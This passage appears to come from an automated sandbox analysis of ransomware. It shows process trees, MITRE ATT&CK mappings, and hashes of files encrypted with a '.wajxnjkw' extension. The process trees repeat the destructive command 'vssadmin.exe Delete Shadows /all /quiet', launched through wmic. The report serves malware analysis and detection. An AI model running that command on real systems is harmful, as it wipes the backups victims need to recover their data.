    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2520

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:200

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2072

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2236
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:236

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1588

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2752

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:112
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:3032
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2712

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2068

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2360

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:896
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:332
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:572

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b3256a308d2772e4286a5d448a2df202

SHA1
157cbc6d2a6644fc2ac8fa931e9daba276177112

SHA256
94b7adfbf5236448e9d758596259910815c2a7100fae159808c85b446e110a6c

SHA512
190ada58432308ffe76d7c24d6ba4b0ea2b03545c5852b6f823d941a240b8ea3aca452b6ec97c50651a3d05b926578bb2133c0d28493987f2e7dfd93cfef99a9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bb4ce3ecb35292d9316c7d1ffb8ae402

SHA1
2333d58cbaaa03a1e13e675ae634e515788d2fc2

SHA256
675e544e404348aabb5123f670d02815095356db6322d8213cdf46449a9f7a53

SHA512
41f3e6a83c0ed288fc920e0841486e288a8796ad6a09fa37cf4968df3c6647cfe7acb1432ccbc1fa89e40c2904db4ddff27b0f28420dd6db28c480d05bcad8f5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
063ce978d6cb304f9eb2d7e097bb3f80

SHA1
c01d5375ca754ff337b7f541bda6dfd40995e71e

SHA256
27a03dac3b21d22b28674f89322ab81685247d1d97055019a0e43813a276beed

SHA512
9d8fdb360794c14d5bc7d4af184981d743a935487468c246ca23676de62dbe764daa7801596b0906a05a319ed8227344b64a009be749e2d1bd34180620a68d18

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9cc89ecf21ac5c7be481d046fa6ded9f

SHA1
abbf4b46adb4a0a26903767f5d5d00692846c263

SHA256
0df99c2be41dbe0a420e8919f9f0210ec0ef66fa10ce57eca3d2d017cf2d43af

SHA512
58146610cc9bc9c45d625c195e11c59e7d74d2fb9190513c0e2c291b30efa275a7a31e2570e5583d0fe01477884b9d8623dba4e4b187eecd494f14e2a54e5dda

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
906bc5930e7eea5946c259e259bf72d2

SHA1
cd9d5229258e7d9593caf2a5878274439c45336d

SHA256
31dd354b6a9a816dfe54a181b6778a2a0c17db26b797f0798992937f12c635a8

SHA512
4a1f8b986dc144e771534dab2de872cda244241beb8dc494dad0207f3617c533c92af48a5cedde527a4329ac8f3021212eff28062020148ad0a26e0657e795d8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d1b21baab8d4d9c627dadf88a3995a6e

SHA1
2efc81ccb37bbb062f8abb8cecf09790c584f5ec

SHA256
e94f068a78f252da6724cd1516a6b9dcd684e0fa7023d814a7d8df16cd148454

SHA512
a6767d34c478e539cdf467edada42accf9abcd469b0ff72ca7804973a4283dbadb023066310701f340125db02fe536c7b71262f9c3ca7b92478c7b50c916a39a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bf38264ccc6b5363a25f0d2147ba2797

SHA1
a4942800284998c4b8dfc4b0657a41e0c502177d

SHA256
cb3a2d1cfe9c2c826a72d69027c8c0d0924a647666aeb6687a6236dc9b7108c2

SHA512
54651d86394f32fae684f9ac7c39c043e3fed5a8bcfa8a19a0f083ce5fbb46e892028c5de12abdec9a1b7169b386eabce039f8de74ec6a5d9acf6c12cba9af10

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1096284fa4bb4c0b25982463316b483e

SHA1
681e9c44cd4ac8d491db9bf83b551660339e80e6

SHA256
1468c0f49943af43e742558b469a6caef8d616486113f01d019a593a0d35e8f6

SHA512
46e54d81af981f417cfff9ad8703dd9f51b41181b618382527df54c0046fb1ed739b3422e6a5f39c471ea933281f7dda8ee771bc2b2dde3e6fc201b433baf00e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
514cf318cfee8fdef2a59164b99d93dc

SHA1
ae06c7f23dd2ff72f4fcfc6cfeda8113394f43c6

SHA256
0e1c8a3216d2c9d71429570a591fb3dfec2e04e5e5dcce07b85ef99208af1777

SHA512
d6cb53babefac97436c636003802ad0e91159884763a0a9fb446b5da1ecb8ff1d0cb5e686f2082cfe72696b8248715e0986bcea455a3fad85dd19476ea275185

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
302ef2e275268be33c9410afdf292328

SHA1
fff423175526a542c87c1fc6598f7dcd51dee9e8

SHA256
33662b472ad4f1ba5e55ae6536434dea4e9519a88badc4a6efd15fddbeed5778

SHA512
9657de92871b8b85d976f386d1c5fa1c15e887a2ba6043a2a6ef9a08ef1c0a9c902069e23f5df941bc3935dbbcc31f17e4ad76226efca1d2f4bc3329a0ddd5b3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
861d37f8253c682c58c1508188dbaf57

SHA1
372363e14f4145c8b7fc37cdd0144fe07fb487eb

SHA256
6928cf7622cf746801022f78398c25c3cb1ee57483db98ca3bcdf713814b3494

SHA512
c5e6ce138e5d6dcf013b5e66cd6ddb7fffe2d8ad265d279e1d0d12819e40234e3a1b72f6d8386e222b0a8e0baa9df74f1eb9a1c590212d4d4c815e940f312406

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
251b78921b17b504b483534ca1622606

SHA1
c4d95d3943c99ddc30e91c1c7c565322782d116b

SHA256
4769cdf77b63affe53c9f07107f3667da3d6e87ddcec5442d0d80eb5cbc27cd4

SHA512
b4141d43c2ef6c9e43abbf77293acaac9b67e3a54558f935c582775d6c82255365943b3681043faf0435292ecd768289a0153da84238e11e6de65be4ef384169

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
45df69519692495681238b561350d62f

SHA1
97b22c0a16ae3d7144bde67840cfa287602e3f6c

SHA256
210215a19844c816849e157296710b62707651e25f282e639e66379a715ecc08

SHA512
aa0af5b9abdd500c2ac8a015c2a9ba2bb0b65bf42083d441e486ea6d60f53c22950b0e5104772a354a61c70385415f806b40c3184e095b11f059035e0266d849

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
344a7939359a49887c0e1e234de66746

SHA1
891459efddbc4ef243d87f3e2b698d7c24d40eb8

SHA256
63b5746dbe42e296823194acd8ac2ebd9f865d38400fe6d6499e6e3b8814da7a

SHA512
071c2d0a3001f921b9cd30d9372adf1c3d8b029f97ed10aa66fc49f03d3787e70a49c9a6e9823e25bce9dff454532ed9a4dbc17e9cbcab4a95198840d83915d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bd15ae71fb288a77db4c76a5278c4ed1

SHA1
a89d3260f62fa702367331c65f3af76bf6ab4f87

SHA256
24e0ff1d54b93122539c237e026ea534972140718cf07b0b9e122677aa31f25e

SHA512
5fe2e61884c0ee24f2465598fc3c152c964c0a1ea2dbf93384b2291c56e685b6e627758ebff40726b8357c7aee1f464af832d07fcea29559b1d260cc01004468

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1289a6daae0834b8cdd0307c42eaa377

SHA1
9a9fa00a6b87135e036c65ad81886b6404fd1ea2

SHA256
0fd7144e7a7156c97f700df7cac1bf1101dc8fec2c7d519c63e27273d01db88f

SHA512
790dec86e7ee2375a8b7840e3504546bf66e1172ee228a825d48a40c25c980a874cee5180f3cb793aca47b39e8c93a36a6dc833de4019069fd4c4da7709a3e49

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
06983d3c65dbca9a54afd852f3e6bb5f

SHA1
1c40173a04e36d5b9877ca5cb76da636417fa8c0

SHA256
cd88c221c776e14b902bc27f3a6c6b0d86d2e414b1b9d1910b2882b2761838cf

SHA512
bd4bfa3b3a6b8c4ed8cfd45130e727ef98b199ca27998279ad454279e16a6007ecae291607a1366bdabece17e2bc99bf35416fab525a00022564683e0ab90e4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
01ec2d78ced0ee90dae8811189c6a8c8

SHA1
57c4c3af4107ce8a98288af59e7b06bda207f133

SHA256
8cb572b5652b1f8320c102c55936017025baa2cf26bc2e4f4800e4680d11bff4

SHA512
6d7a951267218fcc4f6caeed8ade9e200efe55a86304948cfe1bec8fba5df177feb95a6d14b2459aa112ccba3259b4f5453ff774e3047c9e5c3b56833f580074

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
efa0739b51cedb7b929909557886ccb2

SHA1
9cf5fa1da16cbe5c710070cdb2c3ec85d0e5d6b5

SHA256
c0d3c8d761dbd9065b49cc9284df5051379c6d69d5936d277b8a33e7f36f3a0f

SHA512
08b6adde6bca540f7a1c70dee1bd089fd2baf3613616a5927484aa3d23e9674c1a5250bb759369f74b8e90fc3b970e15191998b62935e7e9c42a4130e9b65da4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
41943c3aef4cd84e9febc34552f4a89c

SHA1
ebb73236f29a9449becacb3dbea545c53147c138

SHA256
5a955ab9c88bec8dbba442d2da523a8e009ca199ec7bd4308e0abffb84e6082a

SHA512
9797490089ce53eb5a9c0eae218f7e513759457ffd4b47a3bb76838af434033f07c02a5e83a30ad7579e58add357b25669a6d8c35ab232427365c9aa68d818d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab17A8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar18B5.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\Desktop\ConfirmEdit.xltm.wajxnjkw

Filesize
296KB

MD5
ba8bfcc038208db7302a66adac60ef6d

SHA1
3f3f51e3253609b7b09b234568a786760131d25b

SHA256
83413e0b80c29c8013ad32057ea6dcacf66fa022b8be92f154123e4e9b75776e

SHA512
07261029787294a15ce3624b08851c282fd7160377ad710eff5c7ffb6a404ac7646cb13693d8d45674c73438708c854bdcb3bb68726e974a3882c54dc2d483d5

Download Submit
C:\Users\Admin\Desktop\ConfirmInitialize.mpeg.wajxnjkw

Filesize
264KB

MD5
ec2a95a4ec2b09b44dbf1aa1e14baeab

SHA1
66dc6331aaa9cd12e1be64fc9a4a7f22b0f3a29f

SHA256
3361e1265a2fc18d4e41e467ba17dce8f8028812b1295c28a2b124a044ba8518

SHA512
668fda1d417b12f669e482d127c5d384bdac42d920b6508c7e11e121300a9d712c45bec827f6a63dae88bc8845b70a71ff2e5acc91d7d5f582adf9eae39dc752

Download Submit
C:\Users\Admin\Desktop\ConvertFromSelect.docx.wajxnjkw

Filesize
21KB

MD5
9be9408e231d98ad30121b937314db51

SHA1
4a55cacbc6a7bfa9bd0ad8d14cbefbf129d4a71a

SHA256
9d4338f22533a50ced6d8d7239d3aa77850e3a7095dce51573a29c7d537e2e05

SHA512
2d5d4464ea4ca819012c10fe5041a14bf1da2026c7be2b5362eab71fcce76ed8455d947c2a23c35d6136a268c949e8c7826ef382696b91dd0eef662c9485a1bb

Download Submit
C:\Users\Admin\Desktop\ConvertFromSwitch.wps.wajxnjkw

Filesize
137KB

MD5
957245227d6fa3d0304c0ec2975eb104

SHA1
74327e901cc79e1904b6c2f2ed2fb45388408755

SHA256
513fae14b2daf85594808f0784aae9a8ce20e754d99a7b784afd48a69b8d52fb

SHA512
1357aaa7676ce7ffdf484174b73617a07e46ee493ecf6e4c774e97d218467e8e67b53c29dcfc3603822684e650686ceea6043b9e3cdaa69e1ef451c122ae641f

Download Submit
C:\Users\Admin\Desktop\ExpandUpdate.gif.wajxnjkw

Filesize
455KB

MD5
3ac0a1e2da097d673695044ccbc5c8ff

SHA1
acd3a371bf225bdd454a80a819a8b177d37a30db

SHA256
47ef18ff1465d2177b9911dc3851f41a4ca82463897e61f6e3abd9b6a2526855

SHA512
26cd32101aaace77dd2276218f37bb002cf1a0b8a846920d894ca105491468e58bfbe594f32440c68ccdd82e2a2a897ef418435d81de91fcb919c32093f7ee00

Download Submit
C:\Users\Admin\Desktop\FormatHide.xlsx.wajxnjkw

Filesize
11KB

MD5
dd2b7474b096316514b2178aebf745df

SHA1
1d386ad6d0320db990b9e4fe673db273d6dd4e1e

SHA256
3e16ff30f0026f5d79dbfeaccb9e3c0aec339deab2bc725134b4c60fb5ac7a1e

SHA512
7c12e777866548a25780a2fd1d846b2d73332c424e814014a5ec01459ba396090d5b70ee231f349ed9b2dfaf7a31fdf219fb9284cc5550796b39c90b869bbe44

Download Submit
C:\Users\Admin\Desktop\GrantExpand.xlsm.wajxnjkw

Filesize
232KB

MD5
a4a460f9d0d58715cf958686df65fa89

SHA1
b1514c235ece8783217f59a78cbbaadfd0606cde

SHA256
d6148e47f3fe2ff9de8ed9dd00d51564bee576db4c819b5877efbdb44c0afd85

SHA512
7c065b4e793973083d5a5043ffe319c9e7d53141ab09de8b5c4ca330d554a9d8cc7448ca4c023d06416d5b7394a7bee16af103865ff2cfb6033f42a6529f1f71

Download Submit
C:\Users\Admin\Desktop\ImportStop.mov.wajxnjkw

Filesize
201KB

MD5
8e50a411e2c82a8a1ad1046378f2a22c

SHA1
6cba09be1fda56a23bad46c6fdaca2496242ddc9

SHA256
85dc96791bcc6c1179c1ade5915342c138ee46a361f0bff0e5e95a3722dd54ee

SHA512
8dabfb010bb832bc63709c681f05cb6b47fbef63651ca0d7119040097283e1b9bb894ddf934974bd8418d05bad033a7a8fd7524c51c3fd1632c7e8b95ff76492

Download Submit
C:\Users\Admin\Desktop\LockUnlock.xlsx.wajxnjkw

Filesize
13KB

MD5
da9f815e4a724cab3bf548faa43b7cf0

SHA1
52929b18e9df0494978eeb46c48a95305d393ef7

SHA256
ce6c8cb92d87e52b68931bc15f813f65f1750c0f92efe2ad7b9b37ef77d54583

SHA512
59e7d3f6522808be3d82f6564c3170cb47e9fc74473a4acc74ee9be21743d92ac67f0d08fba140d5b176cdb9a7c5652372d45f85e4a4c7854d93ac117a1a4a40

Download Submit
C:\Users\Admin\Desktop\MergeEnable.jpeg.wajxnjkw

Filesize
254KB

MD5
1fb57ae14a2f4111df9407928926408d

SHA1
6a7c046160a005384b9db97fe04c14b6fb4d32f6

SHA256
de98535b5882d1218b722d11436738ccf0792471ebc7b4e8dd13df2bd6889c76

SHA512
2fdec1bb83c024eceb37082fc14b4c03085b17c7efb8e8a823155851ac8bddcf23929c7a2ced747ba2871f4c8e6ae86672f197734eafa2723b45a563f8b11cef

Download Submit
C:\Users\Admin\Desktop\RedoSend.vsd.wajxnjkw

Filesize
317KB

MD5
08cf9134f7a570893cf0d88c8042b131

SHA1
cbd4e9ff8db78cdf1011ecb993fd0df0072d3d95

SHA256
74847574042b6168a8db04960716a652d0bfaf5ec0bfd3b2bd7f1bf003affc15

SHA512
7b2eff468eb4c236890fe7b518cdd8a0cc3bcd7d36455d3b2396d15e9cd0c70154422de8222c5a2b1be2683d5747efc127fb4d5c5054dd45369ab53659e33dd2

Download Submit
C:\Users\Admin\Desktop\RepairCompare.docx.wajxnjkw

Filesize
20KB

MD5
700560e4d90469c3968bf075dc3a5279

SHA1
b06c3be78982e1c1390d4f52aad4568cdd5a7027

SHA256
3b218af995d05904645bac9d1697609c307e3afa45ce72128374ac085e140212

SHA512
4b04f76198ff5dfaf1694e45e4a7fdef866fdb98d69f3a607d23bc338fd0dc16fe26ef1466727563123b25385f6ffb5054855ca0afa142333563616b4d342b46

Download Submit
C:\Users\Admin\Desktop\RestartSuspend.mpeg.wajxnjkw

Filesize
190KB

MD5
b2bd0710da48fb033af72d18577045eb

SHA1
a3f7d19311b0097eb41a707028e9b40ab219d7a6

SHA256
6b17fbee798cc794aedd0acc24dbfd9c94e216540cc32fdbf25f8a5a4c265757

SHA512
fb3025ecb65be27aa4b8d11d9325fbd150b16a1a99e4c0377680e354b058ef6c1bc2d680103c40cef4a085614b564c65748430f5a4dc73208fa6b47fe34b9946

Download Submit
C:\Users\Admin\Desktop\SaveResolve.xlt.wajxnjkw

Filesize
222KB

MD5
a2dbb86a4df63281efb5d6acca528fa8

SHA1
c1463a6291b069ee8946c5bc717b2b163b9654e1

SHA256
fa0da9ee7c6c9983d47dabe4f1bfba41006063987f8ca2fb380d97064cf99cb7

SHA512
ef30581820c0711083a85b4aab41576a3c503c7e2dc0c36ad45576fab88b78558b5eb36b83936545031bff7380e957318353a5013ea13325cdbc060b53b4a367

Download Submit
C:\Users\Admin\Desktop\TraceInstall.docm.wajxnjkw

Filesize
116KB

MD5
6515ab8d64771dad1a9d6cdf1d11ecd5

SHA1
e3b04ef0d65a1f8e0dd8671a58e410ed1bce12c2

SHA256
d8c61d3ae067d729a4910a4861540d905991fa3a7bb46ac03a1c4d117e4ac745

SHA512
27d083ebafe1ab53ef535a4321460f70f13f4f85f52ba5824c5f5d64405949459913797291cd3e4c28eb64e29c08fd609cd4e7bfac4dd1ca0ffcb4db25c1c3b7

Download Submit
C:\Users\Admin\Desktop\UpdateSuspend.pptm.wajxnjkw

Filesize
243KB

MD5
097d9b4ad114055b8ef34fe5c304a6ec

SHA1
1a4c9762a28c0995f80cf4149c22bf21528e597d

SHA256
6f25ffa5700aa9eb02f81f9ced1f73552f6aab66dee33af0ae51cb27c991a1d0

SHA512
d983ddaca877822434f355908a73d7ba5b73301fd4ef01536aecd0ef5a79724066b06008f24315b3bab1569fbbbc9ddf8a96ee3530223ea991af0ec0298d99b7

Download Submit
C:\Users\Admin\Desktop\WaitBlock.jpg.wajxnjkw

Filesize
275KB

MD5
336cd5508254e44abcab61e478423770

SHA1
e8ce47d35aaccedd9847ea59154d8cdbd4407bbc

SHA256
027bd5a5ec612d8727e7a085a9469cbce436f4b1e037c6a7c837f1ae1fb33a03

SHA512
ce61bc313a3a260f8c745264185db4cc372ba8839301eaecd990941f122b4cddba025e15ec7522edd7e35a0b608250bab7f55285bf7073618cf9871e53eedf6a

Download Submit
C:\Users\Admin\Music\ExportStep.iso

Filesize
1024KB

MD5
46f4468b3764b5dc15dec6b66b77dfe2

SHA1
8334b5e0b5840aafb6d405624b2a1af8414da7d3

SHA256
8486c3c95aba2bee7beded909d3a74b840d81bc4cc7aa2dacd669ce34b5a2f45

SHA512
1964ba85d873623d53a33f2470571b7635c2fb3c4baf8fae14d58430020237bda7b5859dbfaa1c80ee9026dd14f218bde630078206fa2ac896d3036029a85630

Download Submit
C:\Users\Admin\Music\ExportStep.iso

Filesize
1024KB

MD5
8bf50f6d81d9f1bef85e56b3a4d66745

SHA1
744ab7517ae3e40ea1ebc379e5996818c4ef343d

SHA256
adaddecdbe0ac462ae2eb1d7c1697ff2029871c7e2963bc952e89e75f1345601

SHA512
1ab35374a444c7c4b77800546b25a84d1fced541b7282b10dcbde05d3c0a77a22009f9099153d748345174fd8c1460582932dde1e0386cd0135cdb868d9ff7ee

Download Submit
C:\Users\Admin\Music\ExportStep.iso

Filesize
1024KB

MD5
e0b7372a131f92d297d5159dc3faf4f2

SHA1
3f5563ec8ffb32aeb5a63694d727e5f53e712d5c

SHA256
64ef5521e07d2a2864f10b8e9d7ba0fdee7c3f0865597bb428856e74b97309de

SHA512
d76e6c90a993fa46701f0e31d669f2e14fbbc3d2a48fc92e4c8e79062e062cae33c2247127dc60e4c7624f2fcf176f8139809bc7b7cc695ef39da5d1d89a41f0

Download Submit
C:\Users\Admin\Music\ExportStep.iso

Filesize
1024KB

MD5
f3b0b5bee930321f1e32a039b33d56e6

SHA1
62cc877015b91800d69b578eb07de5316163e624

SHA256
98d812172cd90e8b25f77414ead69256bbeb58b6a1e7ba968a444538572675c0

SHA512
d69272d7df5ed2589081256f99d7931c5d02523c35e5f436d33ae4f97970de88b261abe97b3e443d78487b74a2d90b8bff50d984f3bc0e8157f29926e6148313

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
2b963379a38f735e90f85adf8c38f64c

SHA1
e6d13d16f25bc047de54927fce2c3f07cdd6d4e8

SHA256
286fd0466c20e427a6bdfe3672b5843f2ae57079b0de7d28b2b0a8aecaa535bf

SHA512
0c873f542ad2d52aabcf3ac98b67d3ff3ea15ee78119539e5f9deba4b8fddd0459a9385690435561df53359e014519500b0c24302183af41fdd03713f69d03c8

Download Submit
memory/1084-0-0x00000000002D0000-0x00000000002D5000-memory.dmp

Filesize
20KB

Download
memory/2532-313-0x0000000001D60000-0x0000000001E60000-memory.dmp

Filesize
1024KB

Download
memory/2532-314-0x0000000001D60000-0x0000000001E60000-memory.dmp

Filesize
1024KB

Download
memory/2768-7-0x0000000001AE0000-0x0000000001AE1000-memory.dmp

Filesize
4KB

Download
memory/2768-2-0x0000000001C50000-0x0000000002574000-memory.dmp

Filesize
9.1MB

Download
memory/2768-5-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/2768-6-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/2768-4-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/2768-8-0x0000000001AF0000-0x0000000001AF1000-memory.dmp

Filesize
4KB

Download
memory/2768-9-0x0000000001B00000-0x0000000001B01000-memory.dmp

Filesize
4KB

Download
memory/2768-10-0x0000000001B10000-0x0000000001B11000-memory.dmp

Filesize
4KB

Download
memory/2768-11-0x0000000001B50000-0x0000000001B51000-memory.dmp

Filesize
4KB

Download
memory/2768-12-0x0000000001B60000-0x0000000001B61000-memory.dmp

Filesize
4KB

Download
memory/2768-13-0x0000000001B80000-0x0000000001B81000-memory.dmp

Filesize
4KB

Download
memory/2768-14-0x0000000002670000-0x0000000002671000-memory.dmp

Filesize
4KB

Download